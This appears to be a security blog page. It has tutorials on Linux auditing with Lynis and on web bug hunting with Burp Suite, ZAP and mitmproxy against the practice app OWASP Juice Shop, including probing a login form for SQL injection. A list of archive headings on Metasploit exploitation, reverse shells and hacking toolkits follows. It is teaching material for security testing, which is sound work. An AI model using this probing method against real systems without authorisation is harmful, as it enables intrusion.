Monitor the attack surface and determine the threats involved with it until you know what it is. Once the attack surface is crucial, the inventory also aids in the prioritization of the components to secure. Identifying the attack surface helps in reducing it and implement appropriate defenses. With fewer potential attack sources, defense measures get focus, resulting in increased security. A few recommendations are:

Delete unnecessary files and documents.
Monitor network devices and logs.
Segment the networks.
Strong passwords.
Monthly awareness training for employees.
Monitor zero-day vulnerabilities.
Apply patches on vulnerable systems.
Use Honeypots.

The post The Attack Surface Mapping guide for Ethical Hackers appeared first on Tech Chronicles.

Linux Security Auditing With Lynis

Majordomo — Mon, 22 Mar 2021 13:35:37 +0000

Installing Lynis

Lynis is an extensible security audit tool for computer systems running Linux, FreeBSD, macOS, OpenBSD, Solaris, and other Unix derivatives. It assists system administrators and security professionals with scanning a system and its security defenses, with the final goal being system hardening.

Lynis is available as a package for most Linux distributions, we can install it by running the following command:
sudo apt install lynis

To display all the options and commands available, we can run the following command:
lynis show options

Before we get started with scanning, we need to ensure that Lynis is up to date. To check if we are running the latest version we can run the following command:

sudo lynis update info

System Auditing With Lynis

To perform a system audit with Lynis we run the following command:
sud

Lynis will output a lot of information that will also be stored under the /var/log/lynis.log file for easier access. The summary of the system audit will reveal important information about your system’s security posture and various security misconfigurations and vulnerabilities.

Lynis will also generate output on how these vulnerabilities and misconfigurations can be fixed or tweaked.

The output also contains a hardening index score that is rated out of 100, this is used to give you a trackable tangible score of your system’s current security posture.

Lynis will also display any potential warnings that will indicate a severe security vulnerability or misconfiguration that needs to be fixed or patched, in this case, we have no warnings.

To increase our hardening index score, Lynis provides us with helpful suggestions that detail the various security configurations we need to make.

After following the suggestions and making the necessary changes, we can run the system audit with Lynis again.

As shown above, there is a significant improvement in the hardening index score that confirms the changes and configurations we made are applied and effective.

Pentest With Lynis

Lynis also has the ability to simulate a privileged/internal pentest on the system, this can be invoked by using the following command:
sudo lynis –pentest

This will perform a pentest on the system and will output a hardening index score that reflects the overall security posture of the system.

The post Linux Security Auditing With Lynis appeared first on Tech Chronicles.

Security Bug Hunting with Proxies

Majordomo — Sun, 31 Jan 2021 20:19:50 +0000

When hunting security issues or checking applications for potential privacy violations, the first tool I reach for is a web proxy. I frequently get asked about the tools I screenshot in these posts, and asked about my process, so I decided to share the basic steps I take to test a web application for security or privacy issues.

This information is targeted at someone with basic knowledge of the HTTP protocol and how the web works. It also assumes familiarity with common website vulnerability classes like the OWASP top 10. Some programming helps too, but isn’t required.

Web Attack Proxies

Web attack proxies are configured to be an intermediary between your browser and the target site, capturing all requests and responses made between you and the site. This let’s you quickly inspect data flows, modify data in flight, and automate tests or other tasks. They also typically include a ton of other advanced features, like decoding or encoding data, passive and active vulnerability scans, and more. I’ll only touch the surface of these options today, but once you start using a proxy it’s easy to learn more!

There are three that I use on a regular basis:

Burp Suite: The industry standard. The community version is limited in many ways, but is still excellent software. This is my normal go-to proxy.
OWASP ZAP: Fully open source, with many of the same features as Burp. Sometimes it’s even ahead in some areas.
mitmproxy: I’ve been trying to do more of my proxy work in mitmproxy lately. It’s very automateable and fully open source.

Using BurpSuite

Let’s start with Burp. It’s pretty easy to use and beginner friendly, without sacrificing advanced features. Download it via the link above and fire it up. Once it opens, click through to a temporary project and select the “proxy” tab.

You can configure your normal browser to use Burp, by setting the proxy to localhost:8080 and installing the generated Burp certificates (downloaded by navigating in that same browser to localhost:8080), but burp includes a built in chromium browser all setup correctly. I’d start by clicking the “intercept is on” button to disable intercept (it will pause all connections while you inspect the traffic, making the browser appear to be frozen) and then click open browser.

Burp proxy screen

Now, lets try attacking the vulnerable OWASP application Juice shop. Open https://juice-shop.herokuapp.com/#/ in the burp browser.

Reconnaissance

The first step in bug hunting is understanding the application you are testing, and where it might have weaknesses. Normally, I browse around a site clicking various links and looking for areas that look interesting. A few things I immediately check out:

Login forms or any kind of authentication flow.
Any forms I can submit (feedback, lead generation, etc). I submit every form with some valid test data so I can store the request in the proxy.
Any link that gives any kind of error (401/Unauthorized can be interesting to look for auth bypass, 500 server errors might indicate something exploitable, etc).
Any URL that looks like it might have a unique ID in it – thing like site/product/1 or product?id=1 in the URL.
Any page that includes data submitted in the URL or a request on the page, or includes something that looks like a filename or url. Something like view?file=thefile.txt

I’ll sometimes also spin up a scan like dirbuster if the site allows automated tools, but they can be pretty heavy sometimes. A few files to check for manually:

.git directories
.htaccess files
robots.txt and anything interesting in it
If you know the software stack, configuration files for that stack.

While looking around the site, if something looks particularly interesting, I may dive right into testing. Definitely take note of anything you want to return to.

As you have browsed around in the Burp browser, your “target” tab has been filling up with every page visited (request & response is saved) and the proxy->HTTP History has been also keeping every request in order.

Finding & Exploiting a Vulnerability

Juice shop is full of vulnerabilities, so you should find plenty to play with. I’ll start right into the authentication flow, and submit some fake username to log the request in the proxy.

Juice Shop is interesting in that every request isn’t stored in the target tab – so for the login form I have to look at the HTTP request history, since I didn’t see the post request where I was expecting.

In the below gif, you can see me find the login request, move to the repeater tool, run the request again with normal input, then with some special characters, revealing an error message that indicated SQL injection might be possible.

Finding a SQLi vulnerability in Juice Shop

It won’t always be so simple – in this case we see a SQL error message clearly. It might also have presented exactly the same information as before (invalid user) while still being vulnerable. Usually, I would probe the form with several different inputs looking for variances in the response before moving on.

Keep in mind that a form like this can have more than just a SQL back end. A key part of testing is forming a mental model of the various technologies in use on the back end, and how they fit together. SQL is pretty common, but I have also seen noSQL (mongo), XML, file system, even network requests from a form like this. Each will have a different attack surface.

Let’s do the same thing, but with mitmproxy

If we wanted to automate the above tests in some way, or do any kind of brute forcing, we would need to upgrade to Burp Pro (which is worth it!). But we could also use a different proxy. ZAP works pretty similarly to burp, but mitmproxy looks a little different. Here’s the same flow in mitmproxy:

Finding the same bug with mitmproxy

Mitmproxy requires a little extra setup – you’ll need to install their CA cert into the browser you are using by navigating to mitm.it once you have the proxy configured in your browser.

It’s a little harder to follow, because most interaction is with the keyboard. mitmproxy mostly follows vim keybindings. r replay’s the request, e enters the editor, and the arrow keys or q navigate between screens.

Finding Privacy Violations

When testing for privacy issues in applications, the setup is the same: configure the application (or the entire machine) to put all network requests through the proxy. Use the application normally for a while, and monitor the flows.

This won’t work as well if the application doesn’t use the HTTP protocol (in which case, network monitoring tools or injecting into the process are required), but I find almost all applications use HTTP primarily.

As you use different functionality in the application or tool, watch the network requests and read through the request and response data carefully. Check URL parameters, cookie information, and data in the request headers and POST data.

This is often where decoding tools come in. Common encodings I have seen (where tools try to hide their privacy violating practices) are base64, Hex, and URL encoding. Noticing what action generates what request can give a hint as to what data is being sent.

Conclusions

And that’s the basic workflow! Of course, there are many tools that help with finding specific classes of bugs, or help inspect particular tech stacks, or automate particular tests. I think that when first starting to hunt security bugs, it’s good to understand how to do it manually, then move on to the more powerful tools to automate away the repetitive tasks you find yourself doing.

The post Security Bug Hunting with Proxies appeared first on Tech Chronicles.

Pentesting Archives - Tech Chronicles

Modular Distributed Fingerprinting Engine – Scannerl

Introduction

Scannerl: Modular Distributed Fingerprinting Engine

Features:

Requirements:

Modules

Fingerprinting modules

Output modules

Install

Debian

Arch

Kali

Basic Usage

Distributed scan [setup & usage]

Standalone usage

Nmap Analysis Tool – Enhancing Network Security Through Advanced Analysis And Reporting

Screenshots

Features

Comprehensive Nmap XML Parsing

Comparative Analysis

Statistical Overview And Visualization

AI-Powered Insights With GPT

Usage

Installation and Setup

Prerequisites

Secure Installation with venv

Exploiting the proftpd Linux Server

Lab Environment

Scanning with Nmap

Researching Vulnerabilities

Launching Metasploit

Search the Database for Known Exploits

Gaining System Access

Gaining a Shell

Data Exfiltration

Usernames and Passwords

Maintaining Persistence

How to Protect Your Network

Karkinos – Penetration Testing and Hacking CTF’s Swiss Army Knife

What is Karkinos?

Disclaimer

Dependencies

Installing

Linux/BSD

Windows

Home Menu

Encoding/Decoding

Encrypt/Decrypt

Reverse Shell Handling

Create a listener instance

Configure the listener

Start the listener and capture a shell

Full reverse shell handling demo:

Directory and File Busting

Create an instance

Configure it

Start scanning

Full Directory and File Busting demo:

Port Scanning

Launch the scanner

Configure it

Start scanning

Full Port Scanning Demo:

Generating Hashes

Cracking Hashes

Hacktronian: All in One Hacking Tool for Linux

Features:

HACKTRONIAN Menu :

Information Gathering:

Password Attacks:

Wireless Testing:

Exploitation Tools:

Sniffing & Spoofing:

Web Hacking:

Private Web Hacking:

Post Exploitation:

Supported Platforms:

Installation in Linux :

Installation in Android :

Secure Installation with `venv`